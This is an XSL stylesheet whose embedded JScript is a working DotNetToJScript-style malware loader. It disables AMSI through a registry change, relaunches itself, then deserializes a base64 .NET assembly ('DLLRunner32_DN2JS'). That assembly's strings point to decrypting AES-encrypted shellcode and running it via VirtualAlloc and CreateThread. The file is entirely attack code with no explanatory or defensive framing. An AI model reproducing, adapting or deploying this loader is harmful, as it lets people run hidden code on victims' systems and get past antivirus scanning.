<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[
        // START DN2JS PAYLOAD
        function setversion() {
            new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
        }
        // 4MS7_BYP455
        var sh = new ActiveXObject('WScript.Shell');
        var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";

        try{
            var AmsiEnable = sh.RegRead(key);
            if(AmsiEnable!=0){
            throw new Error(1, '');
            }
        }catch(e){
            sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
            sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run()
            sh.RegWrite(key, 1, "REG_DWORD"); // put it back
            WScript.Quit(1);
        }

        // ADD alert() CALL HERE IF DESIRE DEBUGGING
        function debug(s) {}
        function base64ToStream(b) {
            var enc = new ActiveXObject("System.Text.ASCIIEncoding");
            var length = enc.GetByteCount_2(b);
            var ba = enc.GetBytes_4(b);
            var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
            ba = transform.TransformFinalBlock(ba, 0, length);
            var ms = new ActiveXObject("System.IO.MemoryStream");
            ms.Write(ba, 0, (length / 4) * 3);
            ms.Position = 0;
            return ms;
        }

        var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
        "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
        "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
        "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
        "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
        "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
        "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
        "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
        "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
        "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
        "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
        "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
        "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
        "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
        "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
        "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
        "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
        "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
        "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
        "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
        "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
        "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABwAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
        "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAA1tV7wAAAAAA"+
        "AAAA4AACIQsBMAAAFAAAAAYAAAAAAACKMAAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAYA"+
        "AAAAAAAAAIAAAAACAAAAAAAAAwBghQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAODAA"+
        "AE8AAAAAQAAAzAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAABwwAAAcAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
        "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"+
        "ALEAawQGAAkBXwOBAAkBUwMBAAkB4wWIAAkBxgCIALkAawQGAAkBcQSOAMEAawSUACEBfwGhADEB"+
        "dwEGALkA2wWpAAkABAC3AAkACAC8ACcAgwCdAi4ACwChAS4AEwCqAS4AGwDJAS4AIwDSAS4AKwDp"+
        "AS4AMwDpAS4AOwDvAS4AQwDSAS4ASwAAAi4AUwDpAS4AWwDpAS4AYwAYAi4AawBCAi4AcwBPAmMA"+
        "iwCdAggABgDBAAEAgAEAAAQAIABaAG4AqgOdA2AAAAEDAFIEAQBBAQUA2wABAEYBBwDzAAIAQAEJ"+
        "AHkFAQAAAQsAHAYCAJAwAAADAASAAAABAAAAAAAAAAAAAAAAALIAAAAEAAAAAAAAAAAAAACuANIA"+
        "AAAAAAQAAAAAAAAAAAAAAK4AawEAAAAABAADAAAAAAAPAMQADgB9AAAAADUxOEUxRkQ2OTk2RTdE"+
        "MEUwNjVGOTJDRjk1MTFFRkIyOTY1NzU4RUU1QjQwMDI1MDFCQTlCOENCNEZGOEVGRjMAX19TdGF0"+
        "aWNBcnJheUluaXRUeXBlU2l6ZT0zODQAPE1vZHVsZT4APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRl"+
        "dGFpbHM+AEVYRUNVVEVSRUFEV1JJVEUAQ09NTUlUX1JFU0VSVkUAU3lzdGVtLklPAERMTFJ1bm5l"+
        "cjMyX0ROMkpTAFQAc2V0X0lWAGRhdGEAbXNjb3JsaWIAVmlydHVhbEFsbG9jAGxwVGhyZWFkSWQA"+
        "Q3JlYXRlVGhyZWFkAEFlc01hbmFnZWQAUGFkZGluZ01vZGUAQ3J5cHRvU3RyZWFtTW9kZQBJRGlz"+
        "cG9zYWJsZQBSdW50aW1lRmllbGRIYW5kbGUARGF0ZVRpbWUAVmFsdWVUeXBlAGZsQWxsb2NhdGlv"+
        "blR5cGUAU3lzdGVtLkNvcmUARGlzcG9zZQBXcml0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0"+
        "ZQBHdWlkQXR0cmlidXRlAFVudmVyaWZpYWJsZUNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJp"+
        "YnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlU"+
        "cmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZl"+
        "cnNpb25BdHRyaWJ1dGUAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmln"+
        "dXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9u"+
        "UmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29w"+
        "eXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJp"+
        "bGl0eUF0dHJpYnV0ZQBCeXRlAGR3U3RhY2tTaXplAGR3U2l6ZQBzZXRfS2V5U2l6ZQBzZXRfUGFk"+
        "ZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcAbGVuZ3RoAEtl"+
        "cm5lbDMyLmRsbABrZXJuZWwzMi5kbGwARExMUnVubmVyMzJfRE4ySlMuZGxsAGZpbGwAQ3J5cHRv"+
        "U3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAElDcnlwdG9UcmFu"+
        "c2Zvcm0AVGltZVNwYW4AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRp"+
        "b24AWmVybwBTbGVlcABjaXBoZXIAbHBQYXJhbWV0ZXIALmN0b3IAQ3JlYXRlRGVjcnlwdG9yAElu"+
        "dFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAZ2V0X1RvdGFsU2Vjb25kcwBkd01pbGxpc2Vjb25kcwBT"+
        "eXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2"+
        "aWNlcwBEZWJ1Z2dpbmdNb2RlcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAFN5"+
        "c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBSdW50aW1lSGVscGVycwBscEFkZHJlc3MAbHBTdGFy"+
        "dEFkZHJlc3MAU3VidHJhY3QAV2FpdEZvclNpbmdsZU9iamVjdABmbFByb3RlY3QAV2FpdABhZXNE"+
        "ZWNyeXB0AENvbnZlcnQAZGVzdABnZXRfTm93AGluZGV4AFN1YkFycmF5AEluaXRpYWxpemVBcnJh"+
        "eQBUb0FycmF5AHNldF9LZXkAa2V5AFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkAQ29weQBN"+
        "b3ZlTWVtb3J5AFJ0bEZpbGxNZW1vcnkAU3lzdGVtLlNlY3VyaXR5AAAAADFwAFEAYQAxAHcAYwBv"+
        "AFEAQwBpAFAAUABuAHMAcAA4AG0AagBlADkAYQBnAD0APQAAAEZyyiwTkYRPoCm0LJ/t96MABCAB"+
        "AQgDIAABBSABARERBCABAQ4EIAEBAgUgAQERQRIHCRFRDh0FGBFREVUPBUUdBQgEAAARUQYgARFV"+
        "EVEDIAANBwACARJ1EXkFAAEdBQ4CBhgFAAIYGAgFBwEdHgACHgAKAAUBEnUIEnUICA4HBh0FHQUS"+
        "WRJdEmEdBQMKAQUGIAEBEYCJBSABAR0FBSAAEoCNDCADARKAkRKAjRGAlQcgAwEdBQgIBCAAHQUI"+
        "t3pcVhk04IkEQAAAAAQAMAAAgJ4uAYCEU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb25zLlNlY3Vy"+
        "aXR5UGVybWlzc2lvbkF0dHJpYnV0ZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVy"+
        "ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5FQFUAhBTa2lwVmVyaWZp"+
        "Y2F0aW9uAQIGCQMGERAEAAEBCQcABBgYCAkJCQAGGBgJGBgJCQUAAggYCAYAAwEYCAgLEAEDHR4A"+
        "HR4ACAgIAAIdBR0FHQUIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEA"+
        "AgAAAAAAFgEAEURMTFJ1bm5lcjMyX0ROMkpTAAAFAQAAAAAQAQALSGFja2luQWdnaWUAABcBABJD"+
        "b3B5cmlnaHQgwqkgIDIwMjQAACkBACRkODMzN2I4OS04ZThkLTRmM2YtOWY4Mi0zZDFlYzgzODEw"+
        "YzEAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjcuMgEAVA4URnJh"+
        "bWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC43LjIEAQAAAAAAAAAAAAAAAAAAAAAA"+
        "EAAAAAAAAAAAAAAAAAAAAGAwAAAAAAAAAAAAAHowAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABs"+
        "MAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABA0YJ9Es/4EZ5BR"+
        "1y6BYuvalcaEwkylThG4NRBsf++L0hoGKkwxjuKGhiSEwkh2pLN0ye7hjaxt3LUkyOCMX8zd5iz0"+
        "e2A/s2yNRqEjgw2YSMGapa+LFdajNDcgbbTV71NJdvF5DgNN2KlJBHNfiUWykN5IYf+GMoOR9Qfy"+
        "cW23gxhkPp8PSPxj4hk3I8foiAgUZ038XGUN7+zXChuFftG9ee4N/23fnsjKUeI01BkwmSqlzKle"+
        "EeX5Sbs50lrhPHKmlvB1kPgdKJKzhxgjia4oZmXXvmKsTZ7E6HeWQSNlJGZa7E9twb3568O5vLK1"+
        "vzsklJX53N9PAv3x+dgf9FvknNRvh47oaxp41Qh9YW5lRRZCPmhegH0cQm4O2pQcoPKNFcEPzVav"+
        "A7cc0lWwsmH1B3/pqegU2iNC6U+kXHL/mcsmjXLqg+hdbxghr7AXoGdH4jsZnmy/6ngX9cho7Y4g"+
        "mqf30RWUhsv0hAXQlHv7Mp3KuKPeD14caXCODBBQIbUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEA"+
        "AAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAHADAAAAAAAAAAAAAHADNAAAAFYAUwBf"+
        "AFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAA"+
        "AAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAk"+
        "AAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsATQAgAAAQBTAHQAcgBpAG4AZwBGAGkA"+
        "bABlAEkAbgBmAG8AAACsAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0"+
        "AHMAAAAAAAAAOAAMAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAABIAGEAYwBrAGkAbgBBAGcA"+
        "ZwBpAGUAAABMABIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAARABMAEwAUgB1"+
        "AG4AbgBlAHIAMwAyAF8ARABOADIASgBTAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAA"+
        "AAAxAC4AMAAuADAALgAwAAAATAAWAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABEAEwATABS"+
        "AHUAbgBuAGUAcgAzADIAXwBEAE4AMgBKAFMALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8A"+
        "cAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIANAAAACoAAQAB"+
        "AEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAVAAWAAEATwByAGkAZwBpAG4A"+
        "YQBsAEYAaQBsAGUAbgBhAG0AZQAAAEQATABMAFIAdQBuAG4AZQByADMAMgBfAEQATgAyAEoAUwAu"+
        "AGQAbABsAAAARAASAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABEAEwATABSAHUAbgBuAGUA"+
        "cgAzADIAXwBEAE4AMgBKAFMAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAx"+
        "AC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEA"+
        "LgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAwAAAMAAAAjDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
        "AAAAAAAAAAAAAAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rp"+
        "b24uQXNzZW1ibHkgTG9hZChCeXRlW10pCAAAAAoL";
        var entry_class = 'DLLRunner32_DN2JS';

        try {
            setversion();
            var stm = base64ToStream(serialized_obj);
            var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
            var al = new ActiveXObject('System.Collections.ArrayList');
            var d = fmt.Deserialize_2(stm);
            al.Add(undefined);
            var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
            
        } catch (e) {
            debug(e.message);
        }
        // END DN2JS PAYLOAD
		]]>
	</ms:script>
</stylesheet>